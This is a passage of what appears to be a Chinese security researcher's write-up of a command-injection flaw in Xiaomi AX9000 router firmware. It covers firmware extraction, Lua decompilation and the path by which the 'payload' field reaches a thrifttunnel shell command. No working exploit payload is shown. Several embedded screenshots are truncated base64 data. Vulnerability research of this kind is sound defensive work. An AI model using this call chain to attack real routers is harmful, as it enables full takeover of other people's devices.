<p blockindex=12><strong>漏洞描述:</strong> 小米<code>AX9000</code>路由器在<code>1.0.168</code>版本及之前存在二进制漏洞(命令注入),该漏洞由于未对非法的<code>appid</code>做出有效限制而引起。已授权登录的攻击者在成功利用此漏洞后,可在远程目标设备上执行任意命令,并获得设备的最高控制权,造成权限提升。</p>
|
|||
|
|
<p blockindex=13>BUT,怎么算<code>CVSS Score</code>应该都是<code>7.2+</code>高危,不太清楚官方的<code>6.5</code>是咋算的了QAQ</p>
|
|||
|
|
<p blockindex=14><img src="data:image/png;base64,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
|
|||
|
|
<p blockindex=15>关于修复后的<code>1.0.174</code>版本的固件,厂商说明目前已经直接由云端推送补丁。</p>
|
|||
|
|
<h3 blockindex=16>准备工作</h3>
|
|||
|
|
<p blockindex=17>首先,可以从官网下载对应版本的固件:<a href=https://cdn.cnbj1.fds.api.mi-img.com/xiaoqiang/rom/ra70/miwifi_ra70_firmware_cc424_1.0.168.bin>小米路由器AX9000 稳定版 1.0.168</a></p>
|
|||
|
|
<p blockindex=18>小米的固件最外面用的是<code>UBIFS</code>文件系统,固件本身没有加密,先用<code>binwalk</code>解出一个<code>.ubi</code>文件,然后用<code>ubireader_extract_images xxx.ubi</code>,可以在<code>ubifs-root</code>内解出三个<code>.ubifs</code>文件,对其中的<code>xxx-ubi_rootfs.ubifs</code>用<code>binwalk</code>再解开,即可得到里面的<code>SquashFS</code>文件系统,也就是核心部分。</p>
|
|||
|
|
<p blockindex=19>小米的前端也是用的<code>Lua</code>编写的,但是其中的<code>Lua</code>文件不是源码,而是编译后的二进制文件,所以我们需要对其进行反编译。目前,对<code>Lua</code>反编译的常用工具有<a href=https://github.com/HansWessels/unluac>unluac</a>和<a href=https://github.com/viruscamp/luadec>luadec</a>。但是小米对<code>Lua</code>的解释器做了魔改,就不能直接用这两个工具进行反编译了,所幸已有师傅对此做了研究,并给出了专门针对小米固件的反编译工具<a href=https://github.com/NyaMisty/unluac_miwifi>unluac_miwifi</a>和<a href=https://github.com/NyaMisty/luadec_miwifi>luadec_miwifi</a>。至于如何对被魔改的解释器或编译器所编译出来的<code>Lua</code>字节码进行逆向,网上也有不少文章,这里不再展开。</p>
|
|||
|
|
<p blockindex=20>我这里用的是<code>unluac_miwifi</code>,最终可以编译出一个<code>unluac.jar</code>,但一次只能对一个<code>Lua</code>文件进行反编译,所以我们需要写一个批量处理的简单脚本:</p>
|
|||
|
|
<pre blockindex=21><code class="hljs language-python"><span class=hljs-keyword>import</span> os
|
|||
|
|
|
|||
|
|
res = os.popen(<span class=hljs-string>"find ./ -name *.lua"</span>).readlines()
|
|||
|
|
|
|||
|
|
<span class=hljs-keyword>for</span> i <span class=hljs-keyword>in</span> <span class=hljs-built_in>range</span>(<span class=hljs-number>0</span>, <span class=hljs-built_in>len</span>(res)) :
|
|||
|
|
path = res[i].strip(<span class=hljs-string>"\n"</span>)
|
|||
|
|
cmd = <span class=hljs-string>"java -jar /home/winmt/unluac_miwifi/build/unluac.jar "</span> + path + <span class=hljs-string>" > "</span> + path + <span class=hljs-string>".dis"</span>
|
|||
|
|
<span class=hljs-built_in>print</span>(cmd)
|
|||
|
|
os.system(cmd)
|
|||
|
|
</code></pre>
|
|||
|
|
<p blockindex=22>小米<code>AX9000</code>路由器固件是<code>AArch64el</code>架构的,由于网上似乎没有公开的<code>AArch64</code>的内核与文件系统,系统级仿真可参考下面这篇文章的步骤<code>extract</code>出来<code>vmlinuz</code>和<code>initrd.img</code>:<a href=https://www.diozero.com/boards/qemuaarch64_bullseye.html>https://www.diozero.com/boards/qemuaarch64_bullseye.html</a></p>
|
|||
|
|
<p blockindex=23>此外,小米<code>AX9000</code>的固件中采用了<code>Apache Thrift</code>的框架,使用<code>C++</code>编写的版本,相关源码可见:<a href=https://github.com/apache/thrift/tree/master/lib/cpp/src/thrift>https://github.com/apache/thrift/tree/master/lib/cpp/src/thrift</a> ,也可参考网络上其他资料,初步认识后对接下来的逆向分析可能会有一些帮助。</p>
|
|||
|
|
<h3 blockindex=24>漏洞细节</h3>
|
|||
|
|
<p blockindex=25>此部分只对该漏洞调用链做大致的分析,感兴趣的师傅可继续深入逆向分析相关细节。</p>
|
|||
|
|
<p blockindex=26>在反编译的<code>/usr/lib/lua/luci/controller/api/xqdatacenter.lua</code>中,可以看到 URL <code>/api/xqdatacenter/request</code> 相关的<code>handler</code>函数是<code>tunnelRequest</code>函数,且访问<code>/api/xqdatacenter</code>这个节点是需要鉴权的(鉴权过程可在<code>/usr/lib/lua/luci/dispatcher.lua</code>的<code>authenticator.jsonauth</code>函数中找到):</p>
|
|||
|
|
<pre blockindex=27><code class="hljs language-lua"><span class=hljs-function><span class=hljs-keyword>function</span> <span class=hljs-title>L0</span><span class=hljs-params>()</span></span>
|
|||
|
|
<span class=hljs-keyword>local</span> L0, L1, L2, L3, L4, L5, L6
|
|||
|
|
L0 = node
|
|||
|
|
L1 = <span class=hljs-string>"api"</span>
|
|||
|
|
L2 = <span class=hljs-string>"xqdatacenter"</span>
|
|||
|
|
L0 = L0(L1, L2)
|
|||
|
|
L1 = firstchild
|
|||
|
|
L1 = L1()
|
|||
|
|
L0.target = L1
|
|||
|
|
L0.title = <span class=hljs-string>""</span>
|
|||
|
|
L0.order = <span class=hljs-number>300</span>
|
|||
|
|
L0.sysauth = <span class=hljs-string>"admin"</span>
|
|||
|
|
L0.sysauth_authenticator = <span class=hljs-string>"jsonauth"</span>
|
|||
|
|
L0.index = <span class=hljs-literal>true</span>
|
|||
|
|
...
|
|||
|
|
L1 = entry
|
|||
|
|
L2 = {}
|
|||
|
|
L3 = <span class=hljs-string>"api"</span>
|
|||
|
|
L4 = <span class=hljs-string>"xqdatacenter"</span>
|
|||
|
|
L5 = <span class=hljs-string>"request"</span>
|
|||
|
|
L2[<span class=hljs-number>1</span>] = L3
|
|||
|
|
L2[<span class=hljs-number>2</span>] = L4
|
|||
|
|
L2[<span class=hljs-number>3</span>] = L5
|
|||
|
|
L3 = call
|
|||
|
|
L4 = <span class=hljs-string>"tunnelRequest"</span>
|
|||
|
|
L3 = L3(L4)
|
|||
|
|
L4 = _
|
|||
|
|
L5 = <span class=hljs-string>""</span>
|
|||
|
|
L4 = L4(L5)
|
|||
|
|
L5 = <span class=hljs-number>301</span>
|
|||
|
|
L1(L2, L3, L4, L5)
|
|||
|
|
...
|
|||
|
|
<span class=hljs-keyword>end</span>
|
|||
|
|
index = L0
|
|||
|
|
</code></pre>
|
|||
|
|
<p blockindex=28>在函数<code>tunnelRequest</code>中,会对传入<code>payload</code>字段内的<code>JSON</code>数据(此处用的是<code>formvalue_unsafe</code>获取内容,显然这是一个不安全的函数,未过滤危险字符)用<code>binaryBase64Enc</code>函数在转成二进制后,进行<code>Base64</code>编码处理,然后拼接入<code>THRIFT_TUNNEL_TO_DATACENTER</code>所指代的命令中并执行。</p>
|
|||
|
|
<pre blockindex=29><code class="hljs language-lua"><span class=hljs-function><span class=hljs-keyword>function</span> <span class=hljs-title>L5</span><span class=hljs-params>()</span></span>
|
|||
|
|
<span class=hljs-keyword>local</span> L0, L1, L2, L3, L4, L5, L6, L7, L8
|
|||
|
|
L0 = <span class=hljs-built_in>require</span>
|
|||
|
|
L1 = <span class=hljs-string>"xiaoqiang.util.XQCryptoUtil"</span>
|
|||
|
|
L0 = L0(L1)
|
|||
|
|
L1 = L0.binaryBase64Enc
|
|||
|
|
L2 = _UPVALUE0_
|
|||
|
|
L2 = L2.formvalue_unsafe
|
|||
|
|
L3 = <span class=hljs-string>"payload"</span>
|
|||
|
|
L2, L3, L4, L5, L6, L7, L8 = L2(L3)
|
|||
|
|
L1 = L1(L2, L3, L4, L5, L6, L7, L8)
|
|||
|
|
L2 = _UPVALUE1_
|
|||
|
|
L2 = L2.THRIFT_TUNNEL_TO_DATACENTER
|
|||
|
|
L2 = L2 % L1
|
|||
|
|
L3 = <span class=hljs-built_in>require</span>
|
|||
|
|
L4 = <span class=hljs-string>"luci.util"</span>
|
|||
|
|
L3 = L3(L4)
|
|||
|
|
L4 = _UPVALUE0_
|
|||
|
|
L4 = L4.<span class=hljs-built_in>write</span>
|
|||
|
|
L5 = L3.exec
|
|||
|
|
L6 = L2
|
|||
|
|
L5 = L5(L6)
|
|||
|
|
L6 = <span class=hljs-literal>nil</span>
|
|||
|
|
L7 = <span class=hljs-literal>false</span>
|
|||
|
|
L8 = <span class=hljs-literal>true</span>
|
|||
|
|
L4(L5, L6, L7, L8)
|
|||
|
|
<span class=hljs-keyword>end</span>
|
|||
|
|
tunnelRequest = L5
|
|||
|
|
</code></pre>
|
|||
|
|
<p blockindex=30>在<code>/usr/lib/lua/xiaoqiang/common/XQConfigs.lua</code>中,可以找到<code>THRIFT_TUNNEL_TO_DATACENTER</code>的相关定义:</p>
|
|||
|
|
<pre blockindex=31><code class="hljs language-lua">L0 = <span class=hljs-string>"thrifttunnel 0 '%s'"</span>
|
|||
|
|
THRIFT_TUNNEL_TO_DATACENTER = L0
|
|||
|
|
L0 = <span class=hljs-string>"thrifttunnel 1 '%s'"</span>
|
|||
|
|
THRIFT_TUNNEL_TO_SMARTHOME = L0
|
|||
|
|
L0 = <span class=hljs-string>"thrifttunnel 2 '%s'"</span>
|
|||
|
|
THRIFT_TUNNEL_TO_SMARTHOME_CONTROLLER = L0
|
|||
|
|
L0 = <span class=hljs-string>"thrifttunnel 3 ''"</span>
|
|||
|
|
THRIFT_TO_MQTT_IDENTIFY_DEVICE = L0
|
|||
|
|
L0 = <span class=hljs-string>"thrifttunnel 4 ''"</span>
|
|||
|
|
THRIFT_TO_MQTT_GET_SN = L0
|
|||
|
|
L0 = <span class=hljs-string>"thrifttunnel 5 ''"</span>
|
|||
|
|
THRIFT_TO_MQTT_GET_DEVICEID = L0
|
|||
|
|
L0 = <span class=hljs-string>"thrifttunnel 6 '%s'"</span>
|
|||
|
|
THRIFT_TUNNEL_TO_MIIO = L0
|
|||
|
|
L0 = <span class=hljs-string>"thrifttunnel 7 '%s'"</span>
|
|||
|
|
THRIFT_TUNNEL_TO_YEELINK = L0
|
|||
|
|
L0 = <span class=hljs-string>"thrifttunnel 8 '%s'"</span>
|
|||
|
|
THRIFT_TUNNEL_TO_CACHECENTER = L0
|
|||
|
|
</code></pre>
|
|||
|
|
<p blockindex=32>可以看到,<code>THRIFT_TUNNEL_TO_DATACENTER</code>所指代的命令为<code>thrifttunnel 0 '%s'</code>。因此,最终所执行的完整命令是<code>thrifttunnel 0 'base64编码的payload字段'</code>,即<code>payload</code>字段中被<code>Base64</code>编码后的<code>Json</code>数据会被传入<code>thrifttunnel</code>程序中,且<code>option</code>为<code>0</code>。</p>
|
|||
|
|
<p blockindex=33>在<code>/usr/sbin/thriftunnel</code>二进制文件中,<code>*(a2 + 16)</code>是传入的第二个参数,即<code>Base64</code>编码后的<code>payload</code>字段内的<code>Json</code>数据,其作为第一个参数被传入<code>sub_1B9B0</code>函数中,而<code>sub_1B9B0</code>函数的第二个参数<code>v11</code>此时是空串。</p>
|
|||
|
|
<p blockindex=34><img src="data:image/png;base64,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
|
|||
|
|
<p blockindex=35>进入<code>sub_1B9B0</code>函数后,可以发现首先将与<code>a1</code>(<code>Base64</code>编码的<code>payload</code>字段)相关的数据作为参数传入了<code>sub_1F1F8</code>函数处理,并最终将其返回结果通过<code>string::assign()</code>赋值给了<code>a2</code>(即上一级的<code>v11</code>变量)。</p>
|
|||
|
|
<p blockindex=36><img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAA+UAAAHiCAYAAACOWW0bAAAACXBIWXMAAA7EAAAOxAGVKw4bAAAgAElEQVR4nOzdTW9jaXbY8T8nE7/E8duMqujEQZDAkgFW8xNIEARwV+pNAWpo2ztJQC2kjXcN0AR65420EKLSzluiBfSmpR0BmSh9AkoEWtwkmbHNFpN4PBk7ydhmFuTRy5Uo8lKXoqT6/4CCiuS9l899o3R4zvM8uW6320WSJEmSJD26H027AZIkSZIkfaoMyiVJkiRJmhKDckmSJEmSpsSgXJIkSZKkKTEolyRJkiRpSgzKJUmSJEmakicTlB+tQ249++3uLExmu/dp7UAu9/jvO2kvdb+ek2lcz9Myqc+EUXxKx3mQ53S/e75umua9w1H/usndc/2Msozu9Slf8/5dl52Xul9TcXRALnfA0bTb8eI0Wc9VWP8EDuxkgvIWLOT4JA7gfebfTLsFTORcvNT90gR5vh5uSsdw4P3uOX0cz+04v4Vut/dve/4Byzy253acNRUv9e+fl7pfj6ZVZ2G5wfz2Em/HWL15AJXK1b+D5njLZOVovUIud/Xv3nNydNBfLvGFRKvOwrB1R1mGAn+2nWd/+eUH5j+edgNeotlN6G5OuxXZe6n7Jek273dJ6nmpn4cvdb8eV5P1uRona6t0N2fSr30AVaBcvtwclSqwCiuF0ZfJytF6hWVW6Xb7Gz46ILdcgcMyH25949Bh5+tGtg24w+zmBufsMbd8wLvuylhffDwHT6Z8XfrUrD/Xb4SlCXry90U/m7PTmnZD9FK8iGve+0KfqNbOMfsUOfwwXnRcWIHyyvUnoJSHxlm6ZbLy9kOZ7vV9ebvE9jzsf3s7Nd/a+YatkyKHh8XsG5Iwu7nEGg2W1ydYIjBl6YPyZF+wHJflCpd9U+bgBNhfvnu5u7azvH/328U2F3YGNynNMrkc5BYg+Xvjxuuj9oMbsk/39dE5Wr+57Fi/yLI4F0dXx2P92us3/kAYYb92FnrHf9hxTu53/Ltx7h5rv0bct3uvjXifo2v73P/j5Nb1cbnB3uv78/Bnd3zdN8q18eDredTjM4pn+pnwXI5z1tf8SG2+5/WHnNOB9wQ8n/tiFv5yG7bmMgiknuG9M9LvyoyM+l7Dro37tpPmOGd+v7+kaz7FfeHfdffw77pn9nddk7/Yat9dtt7slZnXO4nnO7BXgb367XY9L/fs+0T0ytjZPxv4d0RrZ49crsLCTvKgPw/pgvIWLCzD2uFVf7Bul8uTMbvZf+4c5hm8HEeQW4bt86vXDtcy3KukfZirwnn/vdZOYC5xA37Jzbau7Sc+UIbsOzByP7n1HCw3rtrT7QLfpdynrM4FwAnM5YD+MufbvQ/Fy4t+xP062YK5s2vH8AS+vHYMWzu9PxYPox2HvefXDuFjlE895n71r8PDa+uv7d/+cB56bZzA3Ndwfg7zJ/Dll/BVv33f3hUQzQHb0P0Is4ljONK1ccf1/GXil9/QNo9yfEbxTD8TntNxzvqaH9rmIff7yO0Z5TMzFn1m98XsZu/za3/5AUHpc7x3Rj2GGWjtwNzWkM9nRrg2hrR51OM8antGvd9f4jWfyX0xKv+u8++6Ab/jHvXvuqMz9smz+vkdZesFKAK145tP